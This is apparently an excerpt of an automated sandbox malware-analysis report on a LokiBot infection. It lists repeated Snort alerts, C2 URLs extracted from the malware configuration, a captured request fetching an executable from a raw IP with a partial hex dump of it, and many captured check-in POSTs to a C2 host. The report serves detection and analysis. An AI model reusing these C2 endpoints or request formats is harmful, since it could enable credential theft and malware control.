              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49240
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49241
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49242
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49243
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49244
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49245
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49246
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49247
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49248
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49249
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49250
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49251
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49252
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49253
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49254
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49255
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49256
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49257
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49258
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49259
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49260
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49261
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49262
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49263 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49263 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49263 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49263 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49263
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49264 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49264 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49264 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49264 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49264
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49265 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49265 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49265 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49265 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 5.188.89.50:80 -> 192.168.2.22:49265
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49266 -> 5.188.89.50:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49266 -> 5.188.89.50:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://checkvim.com/ga14/fre.php
              Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
              Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Sep 2021 04:50:21 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10Last-Modified: Mon, 27 Sep 2021 22:15:04 GMTETag: "33600-5cd016dd19714"Accept-Ranges: bytesContent-Length: 210432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 48 ba 15 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 01 00 00 14 0a 00 00 00 00 00 18 1b 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 0b 00 00 04 00 00 6d 6b 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 b1 01 00 4f 00 00 00 2c a9 01 00 3c 00 00 00 00 20 0a 00 b8 75 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 94 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6a 01 00 00 10 00 00 00 6c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 80 01 00 00 32 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 c0 01 00 00 1e 00 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 75 01 00 00 20 0a 00 00 76 01 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: GET /wdc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.83.184Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 149Connection: close
